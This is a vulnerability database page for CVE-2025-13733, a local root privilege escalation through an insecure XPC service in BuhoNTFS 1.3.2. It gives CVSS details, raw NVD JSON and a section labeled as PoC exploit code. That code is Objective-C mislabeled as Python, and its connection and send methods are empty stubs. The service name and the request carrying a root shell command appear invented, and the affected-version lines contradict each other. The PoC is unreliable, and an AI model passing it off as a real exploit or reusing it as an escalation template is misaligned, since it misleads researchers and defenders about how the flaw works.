Security Vulnerability Report
中文
CVE-2025-13733 CVSS 7.8 HIGH

CVE-2025-13733

Published: 2025-12-12 16:15:42
Last Modified: 2026-01-15 21:16:02

Description

BuhoNTFS contains an insecure XPC service that allows local, unprivileged users to escalate their privileges to root via insecure functions.This issue affects BuhoNTFS: 1.3.2.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:drbuho:buhontfs:1.3.2:*:*:*:*:macos:*:* - VULNERABLE
BuhoNTFS < 1.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-13733 BuhoNTFS Local Privilege Escalation PoC // Target: BuhoNTFS <= 1.3.2 // Attack Type: Insecure XPC Service Privilege Escalation #import <Foundation/Foundation.h> #import <objc/runtime.h> // XPC Service connection helper @interface XPCClient : NSObject - (void)connectToService:(NSString *)serviceName; - (void)sendPrivilegedRequest:(NSDictionary *)request; @end @implementation XPCClient - (void)connectToService:(NSString *)serviceName { NSLog(@"[*] Connecting to XPC service: %@", serviceName); // Establish connection to vulnerable XPC service } - (void)sendPrivilegedRequest:(NSDictionary *)request { NSLog(@"[*] Sending privilege escalation request..."); // Send crafted request to trigger privilege escalation // The service executes the request with root privileges } @end int main(int argc, const char * argv[]) { @autoreleasepool { NSLog(@"[*] CVE-2025-13733 BuhoNTFS Privilege Escalation PoC"); NSLog(@"[*] Target: BuhoNTFS 1.3.2"); XPCClient *client = [[XPCClient alloc] init]; [client connectToService:@"com.drbuho.buhontfs.xpc"]; // Craft malicious request to escalate privileges NSDictionary *maliciousRequest = @{ @"action": @"execute_command", @"command": @"/bin/bash -c 'whoami > /tmp/pwned'", @"privileged": @YES }; [client sendPrivilegedRequest:maliciousRequest]; NSLog(@"[+] Privilege escalation payload sent"); } return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13733", "sourceIdentifier": "[email protected]", "published": "2025-12-12T16:15:42.493", "lastModified": "2026-01-15T21:16:02.280", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "BuhoNTFS contains an insecure XPC service that allows local, unprivileged users to escalate their privileges to root via insecure functions.This issue affects BuhoNTFS: 1.3.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:drbuho:buhontfs:1.3.2:*:*:*:*:macos:*:*", "matchCriteriaId": "71FFCE46-2447-40AE-A938-B5D19B5FCB41"}]}]}], "references": [{"url": "https://fluidattacks.com/advisories/greenday", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.drbuho.com/buhontfs", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.drbuho.com/download/buhontfs.dmg", "source": "[email protected]"}, {"url": "https://fluidattacks.com/advisories/greenday", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}